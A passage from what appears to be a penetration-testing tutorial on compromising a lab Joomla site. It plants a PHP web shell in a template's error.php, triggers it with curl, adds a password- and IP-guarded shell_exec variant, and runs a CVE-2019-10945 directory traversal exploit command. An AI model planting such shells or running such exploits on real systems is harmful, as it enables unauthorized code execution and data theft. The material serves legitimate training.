Abusing Built-In Functionality

If you receive an error stating “An error has occurred. Call to a member function format() on null” after logging in, navigate to “http://dev.inlanefreight.local/administrator/index.php?option=com_plugins” and disable the “Quick Icon - PHP Version Check” plugin. This will allow the control panel to display properly.

Using the credentials obtained in the examples from the last section, admin:admin, let's log in to the target backend at http://dev.inlanefreight.local/administrator. Once logged in, we have many options available to us. For our purposes, we want to add a snippet of PHP code to gain RCE. We can do this by customizing a template, which requires an account with permission to edit template files (the Super User account created at install time has it).

From here, we can click on Templates on the bottom left under Configuration to pull up the templates menu.

Next, we can click on a template name. Let’s choose protostar under the Template column header. This will bring us to the Templates: Customise page.

Finally, we can click on a page to pull up its source. It is a good idea to get in the habit of using non-standard file names and parameter names for our web shells so that an opportunistic "drive-by" attacker cannot easily find and use them during the assessment. We can also password protect the shell and restrict it to our own source IP address; the password should travel in a request header or POST body rather than in the URL, which ends up in the web server's access log. Also, we must always remember to clean up web shells as soon as we are done with them, but still record the file name, file hash, and location in our final report to the client.

Let's choose the error.php page. Since the file already opens with a <?php block, we can add a PHP one-liner inside it to gain code execution as follows.

system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);

We then trigger it directly through the template's public path, passing the command in our non-standard parameter:

curl -s http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id
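The one-liner above works, but it is open to anyone who learns the parameter name. The following is an added example (not code from the original page) that applies the precautions discussed above: a non-standard parameter name, a password carried in a request header instead of the URL, and a source IP restriction. The parameter name, header name, password, and allowed IP are all assumptions chosen for illustration; it assumes PHP 7 or later and is written to sit inside the existing <?php block of error.php without affecting normal rendering of the error page for anyone else.

```php
<?php
// Added example web shell guard, not part of the original page.
// Every value below is an assumption for illustration.

// Non-standard parameter name; keep it out of reports until the final write-up.
$param = 'dcfdd5e021a869fcc6dfaef8bf31377e';

// Store only the SHA-256 of the access password, so casually reading the file
// does not reveal the password itself.
$pass_hash = hash('sha256', 'ChangeMe-Example-Only'); // assumed password

// Only the tester's source IP may use the shell (assumed address).
// REMOTE_ADDR comes from the TCP connection; do not trust X-Forwarded-For,
// which the client controls.
$allowed_ip = '10.10.14.5';

// Only engage when our parameter is present, so regular visitors still get
// the normal error page.
if (isset($_GET[$param])) {
    // Password is read from a custom header (assumed name) rather than the
    // query string, so it does not land in the access log.
    $supplied = $_SERVER['HTTP_X_SHELL_AUTH'] ?? '';

    // Constant-time comparison of the hashes; on any failure behave like a
    // plain 404 so probing reveals nothing.
    if ($_SERVER['REMOTE_ADDR'] !== $allowed_ip
        || !hash_equals($pass_hash, hash('sha256', $supplied))) {
        http_response_code(404);
        exit;
    }

    header('Content-Type: text/plain');
    // Capture stderr too so failed commands are visible to us.
    echo shell_exec($_GET[$param] . ' 2>&1');
    exit;
}

// Usage from the allowed host (assumed values):
//   curl -s -H 'X-Shell-Auth: ChangeMe-Example-Only' \
//     'http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id'
//
// Before removing the shell, record its hash and location for the report:
//   ... ?dcfdd5e021a869fcc6dfaef8bf31377e=sha256sum%20templates/protostar/error.php
```

The IP check and the header-based password are independent controls, so an attacker who guesses the parameter name still gets a 404 unless they are both on the right source address and hold the password. Restoring error.php to its original content is still the final step; the guard only limits who can use the shell while it exists.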

Leveraging Known Vulnerabilities

Researching a bit, we find that this version of Joomla is likely vulnerable to CVE-2019-10945, a directory traversal and authenticated file deletion vulnerability in the Media Manager component that affects Joomla versions prior to 3.9.5. We can use this exploit script to leverage the vulnerability and list the contents of the webroot and other directories. The python3 version of this same script can be found here. It can also delete files, which is not recommended on a client engagement because it is destructive. Listing directories could lead to the discovery of sensitive files, such as a configuration file or script holding credentials, if we can then access them via the application URL. An attacker could also cause damage by deleting necessary files if the web server user has the required filesystem permissions.

python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir /